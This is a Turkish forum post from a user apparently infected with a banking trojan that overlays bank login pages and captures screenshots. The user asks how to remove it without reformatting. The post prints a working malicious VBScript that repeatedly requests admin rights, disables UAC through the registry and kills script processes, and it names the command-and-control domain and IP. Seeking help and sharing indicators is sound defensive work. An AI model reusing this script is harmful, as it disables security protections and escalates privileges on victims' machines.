Virüs şu şekilde çalışıyor örnek teb yada ykb bankasına girdim hemen ekrana numaranızı girin mobil bankacılık cebine insin yazıyor. Ayrıca ekranımın görüntüsü alıp kaydedip biryerlere gönderiyor.
Kaspersky ve Eset ile taradım görmüyorlar virüsü.
Şüphelendiğim dosyalar:
Aşağıdaki gibi bir .vbs dosya buldum.
Set WPDWPALEJO = WScript.CreateObject ("WScript.Shell")
Do
If MKEEMEATTP() Then
WPDWPALEJO.run "C:\Windows\System32\cmd.exe /c %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, True
Wscript.sleep(5000)
ATBBQPVZIL("wscript.exe")
End If
If not MKEEMEATTP() Then
PMTYQGOCGM()
End if
Wscript.sleep(5000)
loop
sub PMTYQGOCGM()
If WScript.Arguments.Length = 0 Then
Set DHJPTYBPTF = CreateObject("Shell.Application")
DHJPTYBPTF.ShellExecute "wscript.exe" _
, """" & WScript.ScriptFullName & """ RunAsAdministrator", , "runas", 1
End if
end sub
Function MKEEMEATTP()
MKEEMEATTP = False
On Error Resume Next
SSYKIAERJO = CreateObject("WScript.Shell").RegRead("HKEY_USERS\S-1-5-19\Environment\TEMP")
If err.number = 0 Then MKEEMEATTP = True
End Function
Sub ATBBQPVZIL(ITLZPQZMGF)
NTNCIKMSFZ = "."
Set UFTUPYHTAR = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & NTNCIKMSFZ & "\root\cimv2")
Set RWQNOEWCNB = UFTUPYHTAR.ExecQuery ("Select * from Win32_Process Where Name like '" & ITLZPQZMGF & "'")
For Each HIPQJQSESS in RWQNOEWCNB
HIPQJQSESS.Terminate
Next
End Sub
Ayrıca program svnhost.exe adıyla C:\Users\PC5\AppData\Local\Temp\ klasöründe gizli klasör açıp buradan başlıyor klasörler numaralı isimlendirilmiş ve birden fazla anladığım kadarıyla virüs anadosya göndermek yerine temp kopyasını oluşturup buradan başlıyor böylece temp silsem bile anadosya sonra kendini temp tekrar kopyalayıp başlamış oluyor.
svnhost.exe Dosya açıklamasında AutoIt v3 Script yazıyor bence bu makro bir yazılım bir komut var onu çalıştırıyor.
Bağlantılarını taradım. fflaslamarablog.xyz ve 64.4.10.33 gibi site ve iplere bilgi gönderiyor.
Bu virüsten format hariç nasıl kurtulabilirim.